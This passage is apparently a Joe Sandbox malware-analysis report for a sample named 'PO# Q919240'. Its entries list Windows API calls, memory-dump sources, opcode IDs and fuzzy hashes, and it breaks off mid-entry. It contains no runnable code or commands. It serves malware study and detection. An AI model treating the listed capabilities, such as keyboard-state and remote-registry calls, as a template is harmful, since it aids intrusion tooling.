                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                • String ID:
                • API String ID: 2945290962-0
                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                APIs
                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                • String ID:
                • API String ID: 1457242333-0
                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ConnectRegistry_memmove_wcslen
                • String ID:
                • API String ID: 15295421-0
                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • _wcstok.LIBCMT ref: 004675B2
                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                • _wcscpy.LIBCMT ref: 00467641
                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                • _wcslen.LIBCMT ref: 00467793
                • _wcslen.LIBCMT ref: 004677BD
                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                • String ID: X
                • API String ID: 780548581-3081909835
                • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                APIs
                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                • CloseFigure.GDI32(?), ref: 0044751F
                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                • String ID:
                • API String ID: 4082120231-0
                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                • String ID:
                • API String ID: 2027346449-0
                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                • GetMenu.USER32 ref: 0047A703
                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                • _wcslen.LIBCMT ref: 0047A79E
                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                • String ID:
                • API String ID: 3257027151-0
                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                APIs
                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLastselect
                • String ID:
                • API String ID: 215497628-0
                • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                APIs
                • GetParent.USER32(?), ref: 0044443B
                • GetKeyboardState.USER32(?), ref: 00444450
                • SetKeyboardState.USER32(?), ref: 004444A4
                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                APIs
                • GetParent.USER32(?), ref: 00444633
                • GetKeyboardState.USER32(?), ref: 00444648
                • SetKeyboardState.USER32(?), ref: 0044469C
                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                APIs
                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                • DeleteObject.GDI32(?), ref: 00455736
                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                • String ID:
                • API String ID: 2354583917-0
                • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                APIs
                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Enable$Show$MessageMoveSend
                • String ID:
                • API String ID: 896007046-0
                • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                APIs
                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                • GetFocus.USER32 ref: 00448ACF
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Enable$Show$FocusMessageSend
                • String ID:
                • API String ID: 3429747543-0
                • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                APIs
                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                • String ID:
                • API String ID: 3300667738-0
                • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                • __swprintf.LIBCMT ref: 0045D4E9
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorMode$InformationVolume__swprintf
                • String ID: %lu$\VH
                • API String ID: 3164766367-2432546070
                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
